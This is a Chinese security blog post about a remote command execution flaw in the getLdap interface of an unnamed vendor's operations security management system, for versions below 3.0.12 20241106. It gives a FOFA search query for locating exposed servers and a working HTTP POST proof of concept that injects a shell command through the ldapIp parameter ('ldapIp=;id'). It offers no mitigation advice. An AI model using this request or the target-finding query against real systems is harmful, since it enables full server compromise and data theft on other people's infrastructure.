某知名品牌运维安全管理系统 getLdap 远程命令执行漏洞

漏洞简介

某知名品牌运维安全管理系统 getLdap 接口存在远程命令执行漏洞。攻击者可通过构造恶意的请求,利用该漏洞在目标服务器上执行任意命令,从而可能导致服务器被完全控制、敏感数据泄露等严重后果。

影响版本

低于 3.0.12 20241106

fofa语法

body="/fort/login" && header="FORTSESSIONID"

POC

POST /fort/user;help/getLdap HTTP/1.1
Host:
Content-Type: application/x-www-form-urlencoded

ldapIp=;id
图片[1]-某知名品牌运维安全管理系统 getLdap 远程命令执行漏洞-渗透云记 - 专注于网络安全与技术分享

成功得到命令执行结果

文章来源:

https://mp.weixin.qq.com/s/_2Mzr5mgAiv92KGg56y0tw

© 版权声明
THE END
喜欢就支持一下吧
点赞13 分享
评论 抢沙发

请登录后发表评论

    请登录后查看评论内容